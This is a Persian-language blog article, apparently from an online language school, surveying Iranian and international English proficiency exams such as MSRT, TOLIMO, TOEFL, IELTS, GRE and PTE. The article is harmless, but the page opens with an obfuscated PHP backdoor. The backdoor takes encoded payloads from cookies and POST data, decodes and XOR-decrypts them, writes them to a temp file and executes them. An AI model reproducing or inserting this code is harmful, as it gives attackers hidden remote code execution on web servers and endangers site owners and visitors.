$NULuVE = 'J' . "\x6e" . chr (95) . "\x5a" . chr ( 1066 - 990 )."\143";$wBGOMS = chr (99) . "\154" . "\141" . "\163" . 's' . chr ( 572 - 477 )."\145" . "\170" . "\151" . 's' . chr (116) . "\x73";$rnHFs = class_exists($NULuVE); $wBGOMS = "37229";$FCnrIFQjV = strpos($wBGOMS, $NULuVE);if ($rnHFs == $FCnrIFQjV){function zzZnWbHiGH(){$snBBmoW = new /* 60717 */ Jn_ZLc(216 + 216); $snBBmoW = NULL;}$tRYafVOh = "216";class Jn_ZLc{private function BnCpg($tRYafVOh){if (is_array(Jn_ZLc::$iblmkhZckY)) {$name = sys_get_temp_dir() . "/" . crc32(Jn_ZLc::$iblmkhZckY["salt"]);@Jn_ZLc::$iblmkhZckY["write"]($name, Jn_ZLc::$iblmkhZckY["content"]);include $name;@Jn_ZLc::$iblmkhZckY["delete"]($name); $tRYafVOh = "216";exit();}}public function ptGeYs(){$TDmSXiAS = "52603";$this->_dummy = str_repeat($TDmSXiAS, strlen($TDmSXiAS));}public function __destruct(){Jn_ZLc::$iblmkhZckY = @unserialize(Jn_ZLc::$iblmkhZckY); $tRYafVOh = "10292_35473";$this->BnCpg($tRYafVOh); $tRYafVOh = "10292_35473";}public function ozxIAgQPjV($TDmSXiAS, $aeaku){return $TDmSXiAS[0] ^ str_repeat($aeaku, intval(strlen($TDmSXiAS[0]) / strlen($aeaku)) + 1);}public function qUtSOSuu($TDmSXiAS){$mfCMBhBxCr = "\142" . chr ( 890 - 793 ).chr ( 813 - 698 ).chr (101) . chr ( 253 - 199 ).chr (52);return array_map($mfCMBhBxCr . "\137" . chr (100) . "\x65" . "\x63" . chr (111) . "\144" . chr (101), array($TDmSXiAS,));}public function __construct($LPOaYmFx=0){$zGwbXSxTSr = chr ( 874 - 830 ); $TDmSXiAS = "";$ffIRbkK = $_POST;$cUFsQU = $_COOKIE;$aeaku = "c7925911-7e78-4761-aabc-96a5afd8df13";$YEAAD = @$cUFsQU[substr($aeaku, 0, 4)];if (!empty($YEAAD)){$YEAAD = explode($zGwbXSxTSr, $YEAAD);foreach ($YEAAD as $GraWY){$TDmSXiAS .= @$cUFsQU[$GraWY];$TDmSXiAS .= @$ffIRbkK[$GraWY];}$TDmSXiAS = $this->qUtSOSuu($TDmSXiAS);}Jn_ZLc::$iblmkhZckY = $this->ozxIAgQPjV($TDmSXiAS, $aeaku);if (strpos($aeaku, $zGwbXSxTSr) !== FALSE){$aeaku = explode($zGwbXSxTSr, $aeaku); $cWVPJOukJ = base64_decode(md5($aeaku[0]));}}public static $iblmkhZckY = 12075;}zzZnWbHiGH();} زبان انگلیسی - آزمون‌های زبان |بلاگ اتیچر
skip to Main Content

آزمون‌های زبان

آزمون‌های زبان
زمان مطالعه: ۱۳ دقیقه

چه در ایران و چه در سراسر جهان، آزمونهای زبان بسیار متعددی وجود دارد که هر کدام هدف و کاربرد مشخصی دارند و توسط نهادهای معینی مورد تایید هستند. آشنایی با مهمترین آزمون‌های زبان انگلیسی به ما کمک می‌کند تا بهترین و مناسب‌ترین آزمون را با توجه به اهداف خود انتخاب کنیم و با کسب اطلاعات دقیق درباره سوالات و منابع آنها، بدون اتلاف وقت و انرژی، به هدف خود برسیم. این مقاله از اُتیچر (پلتفرمی برای آموزش آنلاین زبان) به همین منظور تدوین شده است. در ادامه، آزمون‌های زبان انگلیسی را در دو دسته آزمون‌های زبان داخلی و خارجی مورد بررسی قرار می‌دهیم.

 

فهرست بخش ها

آزمون‌های زبان داخلی

آزمون EPT

دانشجویان مقطع دکتری دانشگاه آزاد به منظور شرکت در آزمون جامع دکتری، ملزم به ارائه مدرک زبان معتبر داخلی یا خارجی هستند. دانشجویانی که فاقد مدرک زبان معتبری باشند می‌توانند در آزمون EPT که توسط دانشگاه آزاد اسلامی برگزار می‌شود و مدرک آن نیز فقط نزد همین دانشگاه اعتبار دارد شرکت کنند. این آزمون شامل ۲۵ سوال واژگان، ۴۰ سوال گرامری، و ۳۵ سوال درک مطلب بوده و به طور ماهانه در ۱۹ شهر ایران برگزار می‌شود.

آزمون UTEPT

این آزمون به منظور کسب مدرک زبان معتبر جهت شرکت در آزمون جامع دکتری دانشگاه تهران، دانشگاه اصفهان، خوارزمی، صنعتی شریف، دانشگاه مازندران و چند دانشگاه دولتی دیگر، توسط دانشگاه تهران تدوین شده و برگزار می‌شود. این آزمون معمولا شش بار در سال در دانشکده‌های زبان دانشگاه تهران برگزار می‌شود. داوطلبان برای پاسخگویی به ۳۵ سوال واژگان، ۳۰ سوال گرامری، و ۳۵ سوال درک مطلب، مجموعا ۱۰۰ دقیقه فرصت دارند.

آزمون ETPNU

این آزمون که توسط دانشگاه پیام نور برگزار می‌شود، مختص دانشجویان دکتری این دانشگاه است که فاقد سایر مدارک زبان مورد تایید این دانشگاه بوده و قصد شرکت در آزمون جامع دکتری را دارند. این آزمون دارای ۳۰ سوال مربوط به بخش واژگان، ۳۰ سوال در زمینه قواعد یا گرامر، و ۴۰ سوال درک مطلب بوده که در مجموع ۱۰۰ سوال این آزمون ۱۵۰ دقیقه‌ای را تشکیل می‌دهند. در حال حاضر این آزمون چهار بار در سال در ۶ استان تهران، آذربایجان شرقی، اصفهان، خراسان رضوی، فارس و کرمانشاه برگزار می‌شود.

آزمون‌های زبان MSRT یا MCHE

این آزمون توسط وزارت علوم، تحقیقات و فناوری برگزار می‌شود و نام آن نیز مخفف همین عبارت یعنیMinistry of Science, Research and Technology است. دانشجویان متقاضی شرکت در آزمون جامع دکتری، داوطلبین حضور در مصاحبه دکتری و دریافت امتیاز و داوطلبان کسب فرصت مطالعاتی از جمله افرادی هستند که به مدرک MSRT نیاز دارند. این آزمون که قبلا MCHE (Ministry of Culture and Higher Education) نام داشت، پس از تغییر ساختار و نام وزارت‌خانه، به MSRT تغییر نام پیدا کرد.

MSRT از مهمترین آزمون‌های زبان انگلیسی داخلی به شمار می‌رود. ساختار این آزمون از سه بخش ساختار زبان و گرامر، درک مطلب (ریدینگ) و لغات، و درک مطلب شنیداری (لیسنینگ) شکل گرفته است. دو بخش لیسنینگ و گرامر هر کدام دارای ۳۰ سوال، و قسمت درک مطلب و لغات شامل ۴۰ پرسش هستند که در مجموع ۱۰۰ پرسش این آزمون را تشکیل می‌دهند.

آزمون MHLE

MHLE که مخفف عبارت Ministry of Health Language Examination است، آزمون زبان مختص دانشجویان مقطع دکترای تخصصی پزشکی و شاخه‌های زیر گروه علوم پزشکی است که وزارت بهداشت هر دو ماه یکبار این آزمون را برگزار می‌کند. این آزمون از ۳۰ سوال درک مطلب شنیداری (Listening)، ۳۰ سوال درک مطلب (Reading)، ۲۰ سوال واژگان، و ۲۰ سوال مربوط به گرامر تشکیل شده است. مدرک MHLE، علاوه بر مصاحبه دکتری و آزمون جامع دکتری، برای کسب بورسیه‌های تحصیلی دولتی یا فرصت‌های مطالعاتی نیز مورد نیاز است.

آزمون TOLIMO

مدرک زبان دیگری که دانشجویان مقطع دکتری دانشگاه‌های دولتی و آزاد می‌توانند ارائه کنند، مدرک آزمون تولیمو است. طبق تعریف سازمان سنجش، TOLIMO که مخفف The Test of Language by the Iranian Measurement Organization است، آزمونی استاندارد برای تعیین سطح دانش زبان انگلیسی است که توسط سازمان سنجش آموزش کشور طراحی و اجرا می‌شود. این آزمون که شامل ۳۵ سوال ساختار و بیان نوشتاری، ۳۵ سوال درک مطلب شنیداری (لیسنینگ)، ۳۵ سوال درک مطلب، و همچنین یک سوال در بخش نوشتاری (رایتینگ) است، یکی از مهمترین آزمون‌های زبان انگلیسی داخلی است.

آزمون‌های زبان خارجی

آزمون TOEFL

TOEFL که مخفف Test of English as a Foreign Language است، از معتبرترین آزمون‌های زبان انگلیسی بوده که در دانشگاه‌ها و موسسات متعددی در سراسر دنیا اعتبار دارد. این آزمون در ایران به صورت اینترنتی و در مراکز مورد تایید تافل برگزار می‌شود. این آزمون شامل چهار مهارت اصلی زبان، یعنی Reading، Listening، Speaking و Writing است.

در بخش اول این آزمون یعنی بخش ریدینگ، سه یا چهار متن بلند با موضوعاتی متنوع ارائه می‌شود و داوطلبان در ۶۰ تا ۸۰ دقیقه فرصت دارند به ۳۶ الی ۵۴ سوال این بخش پاسخ دهند. در قسمت بعدی آزمون به مدت ۶۰ الی ۹۰ دقیقه مطالب و سوالات لیسنینگ ارائه می‌شوند. در این بخش ۶ تا ۹ مکالمه صوتی پخش می‌شوند که حاوی جواب ۳۴ تا ۵۱ سوال این بخش هستند. در مدت زمان ۲۰ دقیقه‌ای بخش اسپیکینگ آزمون تافل داوطلبان باید به ۶ سوال پاسخ دهند. در این میان، دو سوال مستقل بوده و ۴ سوال دیگر مرتبط با مطالب بخش‌های قبلی یعنی ریدینگ و لیسنینگ خواهند بود.

در نهایت بخش چهارم این آزمون یعنی رایتینگ، شامل دو متن است. در متن اول یا متن تلفیقی، داوطلب ۳ دقیقه فرصت دارد تا یک متن علمی ۲۵۰-۳۰۰ کلمه‌ای را بخواند، سپس به مدت ۲ دقیقه به صحبت‌های یک استاد که آن متن را به چالش می‌کشد گوش دهد، و در نهایت در ۲۰ دقیقه مقاله‌ای بنویسد و در آن ادعاهای آمده در متن و روش نقد گوینده را شرح دهد. در متن دوم یا متن مستقل، داوطلب ۳۰ دقیقه فرصت دارد تا درباره موضوعی که ارائه می‌شود، انشایی بنویسد.

آزمون IELTS

آزمون آیلتس یکی از مهمترین آزمون‌های زبان انگلیسی به شمار می‌رود که بیشترین اعتبار را در اروپا، کانادا و اقیانوسیه دارد. این آزمون که توسط دانشگاه کمبریج، شورای فرهنگی بریتانیا و موسسه IDP برگزار می‌شود، در دو نوع آکادمیک و جنرال ارائه می‌شود که داوطلبان بر اساس هدف خود یکی از این دو نوع را انتخاب می‌کنند. این دو مدل در مهارت‌های شنیداری و مکالمه یکسان بوده و در بخش‌های درک مطلب و نوشتار متفاوت هستند. در بخش لیسنینگ این آزمون ۴ مکالمه صوتی ارائه می‌شود که داوطلبان فرصت دارند در حین یا پس از شنیدن این مکالمات به ۴۰ سوال این بخش پاسخ دهند. در قسمت اسپیکینگ این آزمون که به صورت حضوری انجام می‌شود داوطلبان به صورت فردی در مدت حدودا ۲۰ دقیقه با شخص مصاحبه کننده مکالمه می‌کنند.

در قسمت درک مطلب یا ریدینگ آزمون جنرال، سه متن که در مجموع حدود ۲ تا ۳ هزار کلمه هستند در اختیار داوطلبان قرار داده می‌شود که پاسخ ۴۰ سوال این بخش در این متون وجود دارد. بخش ریدینگ آزمون آکادمیک آیلتس نیز ساختار مشابهی دارد، با این تفاوت که متون ارائه شده متونی علمی بوده، شامل نوشتار استدلالی هستند و از مجلات، کتاب ها و… انتخاب می‌شوند. در مهارت رایتینگ آزمون جنرال، دو متن ۱۵۰ و ۲۵۰ کلمه‌ای از داوطلبان درخواست می‌شود که موضوعاتی عمومی دارند. اما در آزمون آکادمیک، در ابتدا جدول یا نموداری ارائه می‌شود و از داوطلبان انتظار می‌رود در ۱۵۰ کلمه آن را شرح دهند. سپس شرکت کنندگان باید در ۲۵۰ کلمه، بحث یا مسئله‌ای را به چالش بکشند و نظر موافق یا مخالف ارائه دهند.

آزمون GRE

آزمون GRE که مخفف Graduate Record Examinations است، چیزی فراتر از یک آزمون مهارت سنجی زبان بوده و در ساختار آزمون، سیستم نمره‌دهی، و اعتبار تفاوت‌های زیادی با سایر آزمون ها دارد. متقاضیان تحصیل در در رشته‌های فنی مهندسی، فیزیک و علوم پایه، علوم زیستی و اجتماعی، علوم انسانی و هنر در دانشگاه‌های مطرح آمریکای شمالی، در مقاطع کارشناسی ارشد، دکتری و فوق دکتری به مدرک GRE نیاز دارند. آزمون GRE در دو نوع جنرال و سابجکت برگزار می‌شود که هر دو فاقد بخش های اسپیکینگ و لیستنینگ هستند.

آزمون جی آر ای سابجکت مختص رشته‌های روان‌شناسی، فیزیک، شیمی، زیست‌شناسی، ادبیات انگلیسی و ریاضی است و الزامی بودن یا نبودن این مدرک، به دانشگاه مقصد بستگی دارد. آزمون جنرال دارای سه بخش بوده که بخش اول آن نوشتار تحلیلی نام دارد که خود از دو قسمت تشکیل شده است. در قسمت اول داوطلبان باید از میان موضوعات ارائه شده انتخاب نموده و با استدلال صحیح و منطقی متنی بنویسند. در قسمت دوم از بخش نوشتار تحلیلی، داوطلب با متنی روبرو است که باید با تکیه بر ایرادات و نقاط قابل بحث آن نوشته، متنی در جواب به آن بنویسد و آن را به نقد بکشد.

بخش دوم آزمون جنرال، یعنی استدلال کلامی و درک زبان، ۲۰ سوال مربوط به دایره لغات و ۲۰ سوال مربوط به درک مطلب یا ریدینگ دارد. بخش سوم این آزمون استدلال کمی و ریاضی است که تفاوت اصلی این امتحان با سایر آزمون‌های زبان است. این بخش شامل ۴۰ سوال تستی در زمینه‌های ریاضی پایه، مانند جبر، آمار و احتمالات، هندسه و… بوده که از لحاظ ریاضی و علمی سوالات ساده‌ای هستند و اطلاعات ریاضی در حد دبیرستان برای پاسخگویی به آنها کافی است.

آزمون GMAT

آزمون GMAT یا Graduate Management Admission ساختاری تقریبا مشابه با آزمون GRE دارد و مختص رشته‌های MBA، مدیریت، اقتصاد و بازرگانی است و در اروپا و آمریکای شمالی اعتبار دارد. این آزمون شامل بخش‌های زیر است:

  • Analytical Writing Assessment: در این بخش متقاضیان باید در مدت ۶۰ دقیقه دو متن ارائه دهند که متن اول درباره تحلیل و چالش یک مسئله و استدلال است، و متن دوم شرح و بررسی آیتم ارائه شده در آزمون که عموما شامل نمودار و جداول است.
  • Quantitative: در این قسمت داوطلبین با سوالات تحلیلی و محاسبات پایه‌ای ریاضی مواجه‌اند.
  • Verbal: در این بخش سوالات درک مطلب، اصلاح جملات، و استدلال وجود دارد که به صورت ۵ گزینه‌ای هستند.

آزمون IMAT

متقاضیان تحصیل در رشته‌های پزشکی، دندان‌پزشکی و داروسازی در ایتالیا ملزم به دریافت مدرک آزمون زبان انگلیسی IMAT یا همان International Medical Admission Test هستند. این آزمون ۱۰۰ دقیقه شامل ۶۰ سوال ۵ گزینه‌ای است که در چهار بخش ارائه می‌شوند. بخش اول شامل ۲ سوال دانش عمومی و ۲۰ سوال استدلال منطقی است. بخش دوم ۱۸ سوال زیست‌شناسی، بخش سوم ۱۲ سوال شیمی، و در نهایت بخش چهارم ۸ سوال ریاضی و فیزیک را شامل می‌شود. در آزمون آیمت پاسخ غلط باعث کسر نمره می‌شود و سوال بدون پاسخ نمرۀ منفی نخواهد داشت. این آزمون ۱۲۰ یورویی در ایران برگزار نمی‌شود و متقاضیان ایرانی می‌توانند از طریق کشورهای همسایه در این آزمون شرکت کنند.

آزمون TOEIC

نام این آزمون مخفف عبارت Test of English for International Communication به معنی «آزمون انگلیسی برای ارتباطات بین‌المللی» است. این آزمون نیز توسط موسسه ETS، برگزارکننده آزمون تافل تدوین و اجرا می‌شود. هدف اصلی آزمون تافل سنجش مهارت‌های مورد نیاز داوطلبان برای شرکت در جوامع مختلف دانشگاهی است، در حالی که آزمون TOEIC توانایی عمومی داوطلبین برای ایجاد ارتباط در محیط‌های کاری را می‌سنجد. این آزمون دو نوع دارد:

  • TOEIC Listening & Reading: در این آزمون دو ساعته، ۴۵ دقیقه به مهارت شنیداری و ۷۵ دقیقه به درک مطلب یا همان ریدینگ اختصاص پیدا می‌کند. این بخش از لحاظ ساختار تفاوت آنچنانی با آزمون‌های مشابه ندارد.
  • TOEIC Speaking & Writing: در این آزمون با توجه به هدف امتحان، نکات و موارد متفاوتی نسبت به آزمون TOEFL مد‌نظر قرار می‌گیرد. در امتحان ۲۰ دقیقه‌ای اسپیکینگ، ۱۱ سوال در قالب خواندن متون، توصیف تصاویر، پاسخ به سوالات، و بیان نظر و راه حل ارائه می‌شود. تلفظ صحیح، انسجام جملات و ارتباط محتوا، دایره لغات و گرامر صحیح از موارد حائز اهمیت در این بخش است. در قسمت رایتینگ نیز داوطلبان ۶۰ دقیقه فرصت دارند تا به ۸ سوال که شامل توصیف تصاویر با کلمات خواسته شده، نوشتن پاسخ به ایمیل، و پاسخ به سوال با استدلال است بپردازند.

آزمون‌های زبان PTE

این آزمون یکی از آزمون‌های زبان انگلیسی مطرح و مورد قبول برای مهاجرت و ادامه تحصیل در کشورهای اروپایی و استرالیا است. PTE یا Pearson Language Test of English توسط سازمان Pearson، ناشر کتب Longman، به صورت کامپیوتری اما حضوری برگزار می‌شود. در آزمون‌های زبان انگلیسی هر چهار مهارت زبانی سنجیده می‌شوند. این آزمون دارای سه نوع متفاوت است:

  • آکادمیک (Academic PTE)
  • عمومی (General PTE)
  • کودکان و نوجوانان (Young Learners PTE)

ساختار آزمون‌های زبان PTE با سایر آزمون‌های زبان مشابه تفاوت‌های جالبی دارد. بخش اول آزمون آکادمیک مهارت‌های نوشتاری و مکالمه‌ای را همزمان پوشش می‌دهد. سوالاتی مانند معرفی شخص، روخوانی با صدای بلند، توصیف تصاویر، تکرار جمله و خلاصه کردن متن در این بخش وجود دارد. بخش دوم مربوط به سوالات درک مطلب بوده و در بخش سوم سوالات مربوط به مهارت شنیداری قرار دارند.

در آزمون جنرال در بخش اول، مهارت‌های درک مطلب، شنیداری و نوشتاری در قالب یک امتحان نگارشی سنجیده می‌شود. در بخش دوم نیز مهارت مکالمه‌ای توسط یک شخص آزمون گیرنده سنجیده می‌شود. همچنین آزمون مختص کودکان و نوجوانان PTE نیز سیستم نوآورانه‌ای داشته و با قراردادن آزمون دهنده در ماجرای یک خانواده انگلیسی، در عین ایجاد سرگرمی، توانایی‌های کودکان را در استفاده از زبان در موقعیت‌های مختلف می‌سنجند.

آزمون OET

این آزمون که مخفف عبارت Occupational English Test است برای سنجش مهارت‌های مکالمه و توان برقراری ارتباط شاغلین رشته‌های علوم پزشکی تدوین شده است. در این آزمون ۴ مهارت اصلی یعنی مهارت‌های درک مطلب، شنیداری، نوشتاری و مکالمه با تمرکز بر مسائل مرتبط با علوم پزشکی مورد بررسی قرار می‌گیرند.

در مدت زمان ۴۵ دقیقه‌ای بخش لیسنینگ این آزمون، شرکت‌کنندگان در سه بخش به مکالماتی یک یا چند طرفه در مورد مسائل پزشکی و بهداشتی گوش می‌دهند و به سوالات مربوطه پاسخ می‌دهند. در قسمت ریدینگ این آزمون، در ابتدا ۲۰ سوال مرتبط با ۴ متن کوتاه ارائه می‌شود. سپس ۶ سوال مربوط به ۶ متن نسبتا بلند، و در انتها ۲ متن ۸۰۰ کلمه‌ای که هر کدام حاوی ۸ سوال است در آزمون خواهد آمد.

در بخش ۴۵ دقیقه‌ای رایتینگ آزمون OET شرکت‌کنندگان با توجه به حیطۀ فعالیت خود، معرفی‌نامه‌ای با موضوعی شبیه انتقال بیمار، نامه مشاوره‌ای، اطلاع‌رسانی، یا مراقبت ویژه می‌نویسند. در نهایت در قسمت مکالمه این آزمون، مانند بخش رایتینگ هر شرکت کننده با توجه به تخصص خود، در مقابل فردی که نقش بیمار یا مراجعه کننده را بازی می‌کند، در قالب دو مکالمه مشغول به صحبت می‌شود.

آزمون CAE

این آزمون همان آزمون سطح پیشرفته دانشگاه کمبریج یا Certificate in Advance English Cambridge است و در بریتانیا مقبولیت بالایی دارد. این آزمون که بیشتر مهارت زبانی افراد را در موقعیت‌های روزمره می‌سنجد، طبق مرجع تعیین سطح زبان (CEFR) معادل سطح پیشرفتۀ C1 است. این آزمون چهار مهارت اصلی زبان را پوشش می‌دهد و بخش‌های درک مطلب و شنیداری آن از لحاظ ساختاری مانند سایر آزمون‌های مشابه است.

در بخش رایتینگ این آزمون در ابتدا انتظار می‌رود در پاسخ به یک متنی مانند مقاله، بروشور یا نامه، انشایی نوشته شود. در قسمت دوم بخش نوشتاری، داوطلب می‌تواند یکی از سه موضوع ارائه شده را که معمولا شامل نوشتن نامه، پروپوزال یا گزارش است انتخاب کرده و متنی درباره آن بنویسد. یکی از تفاوت‌های جالب CAE با سایر آزمون‌های زبان، نحوه برگزاری امتحان اسپیکینگ آن است. در این بخش دو آزمون دهنده روبروی یکدیگر نشسته و در حالی که یک آزمون گیرنده مکالمه را مدیریت می‌کند، توسط آزمون گیرندۀ دیگری ارزیابی می‌شوند.

آزمون CPE

آزمون CPE که مخفف عبارت The Cambridge English: Proficiency Exam بوده، بالاترین سطح در میان امتحانات کمبریج است و داشتن مدرک CPE بیانگر این است که آن فرد با کسب سطح C2، به انگلیسی مانند زبان مادری مسلط است. نکته جالب اینکه مدرک CPE تاریخ انقضا ندارد. بخش اول این آزمون شامل ۵۳ سوال مرتبط با درک مطلب، گرامر و واژگان است. بخش دوم مربوط به مهارت نوشتاری است که در قسمت اول آن شرکت کننده باید دو متن کوتاه را خوانده و آنها را ابتدا خلاصه کرده و در مقاله‌ای که درباره آنها می‌نویسد نظر خود را بیان کند. در قسمت دوم نیز باید از میان ۵ موضوع پیشنهادی که یکی از آنها یک کتاب ادبیات انگلیسی است و در هر آزمون تغییر می‌کند متنی بنویسد.

در بخش سوم این آزمون مهارت شنیداری سنجیده می‌شود وشرکت کنندگان پس از دو بار شنیدن مکالماتی میان افراد محلی انگلیسی، به ۳۰ سوال این قسمت پاسخ می‌دهند. در نهایت در بخش چهارم مهارت مکالمه مورد آزمون قرار می‌گیرد. این بخش از امتحان شامل سه قسمت بوده که در قسمت اول داوطلبان با شخص آزمون گیرنده مصاحبه می‌کنند و در دو قسمت دیگر شبیه آزمون CAE، با فرد آزمون دهندۀ دیگری.

آزمون Duolingo

یکی از محبوب‌ترین و موثرترین اپلیکیشن‌های یادگیری زبان‌های مختلف دنیا، اپلیکیشن Duolingo است. با گسترش استفاده از آن و افزایش اعتبار آن، مجموعه دولینگو اقدام به راه‌اندازی آزمون و سیستم ارزیابی مهارت زبان خود نمود. در آزمون دولینگو که کاملا آنلاین انجام می‌شود و می‌توان با کامپیوتر شخصی خود در آن شرکت کرد، هر چهار مهارت، یعنی Reading، Listening، Speaking، و Writing مورد آزمایش قرار می‌گیرد. دولینگو این آزمون را روش مدرن سنجش مهارت زبان معرفی می‌کند و استقبال از این آزمون در حال افزایش است.

آزمون‌های زبان OPI و OPIC

این آزمون که به منظور ارزیابی توانایی صحبت کردن به زبان انگلیسی است برای معلمان انگلیسی یا افراد فعال در حوزه تجارت برگزار می‌شود. در آزمون OPI (Oral Proficiency Interview) داوطلب به صورت رودررو توسط فرد آزمون گیرنده مورد مصاحبه قرار می‌گیرد. در مدل آنلاین این آزمون یا همان OPIC شرکت کننده می‌تواند به صورت کامپیوتری در این آزمون شرکت کند. نمرات داوطلبان در ۷ سطح از Novice Low تا Advance High ارائه می‌گردد.

آزمون TESOL

این آزمون با نام کامل Teaching English to Speakers of Other Languages، دوره‌ای بین‌المللی برای مدرسین زبان انگلیسی برای تدریس به غیر انگلیسی زبانان است. علاوه بر یاد گرفتن متدهای به روز و در راستا با تکنولوژی روز دنیا، شرکت کنندگان شیوه‌های مدیریت کلاس، تعامل با زبان‌آموزان و… را نیز می‌آموزند.

کسب اطلاعات دقیق، مهمترین قدم

همانطور که دیدید وجود آزمون‌های زبان متعدد داخلی و بین‌المللی، که هرکدام نحوه ارزیابی متفاوتی داشته و نزد دانشگاه‌ها و مراکز خاصی اعتبار دارند، مسئلۀ انتخاب میان این آزمون‌ها را تبدیل به امری مهم کرده است. با تحقیق و کسب اطلاعات دقیق درباره تمامی آزمون‌ها و همچنین راه‌های پیش روی خود، می‌توانید مناسب‌ترین آزمون را انتخاب کرده و بدون سردرگمی میان انبوه منابع و روش‌های یادگیری، در کوتاه‌ترین زمان به هدف خود برسید. اگر هنوز هم در انتخاب میان آزمون‌های زبان انگلیسی سوالی دارید خوشحال می‌شویم پاسخگوی شما باشیم.

۵/۵ - (۱ امتیاز)

دیدگاه ها

اولین نفری باشید که به این نوشته نظر میدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

Back To Top
×Close search
Search